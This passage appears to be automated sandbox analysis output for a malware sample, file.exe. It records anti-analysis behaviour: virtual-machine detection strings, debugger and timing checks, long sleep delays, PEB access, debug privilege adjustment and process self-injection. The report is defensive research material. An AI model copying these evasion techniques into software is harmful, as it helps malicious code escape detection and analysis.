                  Source: C:\Users\user\Desktop\file.exe Memory allocated: D60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\file.exe Memory allocated: 2780000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\file.exe Memory allocated: 4780000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\file.exe Code function: 2_2_012E096E rdtsc 2_2_012E096E
                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\file.exe API coverage: 0.6 %
                  Source: C:\Users\user\Desktop\file.exe TID: 3664 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 3664 Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 4208 Thread sleep count: 312 > 30
                  Source: C:\Users\user\Desktop\file.exe TID: 4208 Thread sleep count: 169 > 30
                  Source: C:\Users\user\Desktop\file.exe TID: 3228 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 100000
                  Source: file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                  Source: file.exe, 00000000.00000002.3035479477.0000000000947000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00417983 LdrLoadDll,2_2_00417983
                  Source: C:\Users\user\Desktop\file.exe Code function: 2_2_012D0124 mov eax, dword ptr fs:[00000030h] 2_2_012D0124
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135C188 mov eax, dword ptr fs:[00000030h]2_2_0135C188
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135C188 mov eax, dword ptr fs:[00000030h]2_2_0135C188
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013761E5 mov eax, dword ptr fs:[00000030h]2_2_013761E5
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D01F8 mov eax, dword ptr fs:[00000030h]2_2_012D01F8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013661C3 mov eax, dword ptr fs:[00000030h]2_2_013661C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013661C3 mov eax, dword ptr fs:[00000030h]2_2_013661C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01336030 mov eax, dword ptr fs:[00000030h]2_2_01336030
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A020 mov eax, dword ptr fs:[00000030h]2_2_0129A020
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C020 mov eax, dword ptr fs:[00000030h]2_2_0129C020
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01324000 mov ecx, dword ptr fs:[00000030h]2_2_01324000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CC073 mov eax, dword ptr fs:[00000030h]2_2_012CC073
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326050 mov eax, dword ptr fs:[00000030h]2_2_01326050
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A2050 mov eax, dword ptr fs:[00000030h]2_2_012A2050
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012980A0 mov eax, dword ptr fs:[00000030h]2_2_012980A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013660B8 mov eax, dword ptr fs:[00000030h]2_2_013660B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013660B8 mov ecx, dword ptr fs:[00000030h]2_2_013660B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013380A8 mov eax, dword ptr fs:[00000030h]2_2_013380A8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A208A mov eax, dword ptr fs:[00000030h]2_2_012A208A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A80E9 mov eax, dword ptr fs:[00000030h]2_2_012A80E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0129A0E3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013260E0 mov eax, dword ptr fs:[00000030h]2_2_013260E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C0F0 mov eax, dword ptr fs:[00000030h]2_2_0129C0F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E20F0 mov ecx, dword ptr fs:[00000030h]2_2_012E20F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013220DE mov eax, dword ptr fs:[00000030h]2_2_013220DE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01378324 mov ecx, dword ptr fs:[00000030h]2_2_01378324
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C310 mov ecx, dword ptr fs:[00000030h]2_2_0129C310
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C0310 mov ecx, dword ptr fs:[00000030h]2_2_012C0310
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134437C mov eax, dword ptr fs:[00000030h]2_2_0134437C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136A352 mov eax, dword ptr fs:[00000030h]2_2_0136A352
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01348350 mov ecx, dword ptr fs:[00000030h]2_2_01348350
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov ecx, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0137634F mov eax, dword ptr fs:[00000030h]2_2_0137634F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C438F mov eax, dword ptr fs:[00000030h]2_2_012C438F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C438F mov eax, dword ptr fs:[00000030h]2_2_012C438F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D63FF mov eax, dword ptr fs:[00000030h]2_2_012D63FF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013443D4 mov eax, dword ptr fs:[00000030h]2_2_013443D4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013443D4 mov eax, dword ptr fs:[00000030h]2_2_013443D4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E3DB mov ecx, dword ptr fs:[00000030h]2_2_0134E3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013263C0 mov eax, dword ptr fs:[00000030h]2_2_013263C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135C3CD mov eax, dword ptr fs:[00000030h]2_2_0135C3CD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129823B mov eax, dword ptr fs:[00000030h]2_2_0129823B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129826B mov eax, dword ptr fs:[00000030h]2_2_0129826B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135A250 mov eax, dword ptr fs:[00000030h]2_2_0135A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135A250 mov eax, dword ptr fs:[00000030h]2_2_0135A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0137625D mov eax, dword ptr fs:[00000030h]2_2_0137625D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01328243 mov eax, dword ptr fs:[00000030h]2_2_01328243
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01328243 mov ecx, dword ptr fs:[00000030h]2_2_01328243
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6259 mov eax, dword ptr fs:[00000030h]2_2_012A6259
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A250 mov eax, dword ptr fs:[00000030h]2_2_0129A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02A0 mov eax, dword ptr fs:[00000030h]2_2_012B02A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02A0 mov eax, dword ptr fs:[00000030h]2_2_012B02A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov ecx, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE284 mov eax, dword ptr fs:[00000030h]2_2_012DE284
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE284 mov eax, dword ptr fs:[00000030h]2_2_012DE284
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013762D6 mov eax, dword ptr fs:[00000030h]2_2_013762D6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01336500 mov eax, dword ptr fs:[00000030h]2_2_01336500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8550 mov eax, dword ptr fs:[00000030h]2_2_012A8550
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8550 mov eax, dword ptr fs:[00000030h]2_2_012A8550
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C45B1 mov eax, dword ptr fs:[00000030h]2_2_012C45B1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C45B1 mov eax, dword ptr fs:[00000030h]2_2_012C45B1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D4588 mov eax, dword ptr fs:[00000030h]2_2_012D4588
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A2582 mov eax, dword ptr fs:[00000030h]2_2_012A2582
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A2582 mov ecx, dword ptr fs:[00000030h]2_2_012A2582
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE59C mov eax, dword ptr fs:[00000030h]2_2_012DE59C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC5ED mov eax, dword ptr fs:[00000030h]2_2_012DC5ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC5ED mov eax, dword ptr fs:[00000030h]2_2_012DC5ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A25E0 mov eax, dword ptr fs:[00000030h]2_2_012A25E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE5CF mov eax, dword ptr fs:[00000030h]2_2_012DE5CF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE5CF mov eax, dword ptr fs:[00000030h]2_2_012DE5CF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A65D0 mov eax, dword ptr fs:[00000030h]2_2_012A65D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA5D0 mov eax, dword ptr fs:[00000030h]2_2_012DA5D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA5D0 mov eax, dword ptr fs:[00000030h]2_2_012DA5D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C427 mov eax, dword ptr fs:[00000030h]2_2_0129C427
                  Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
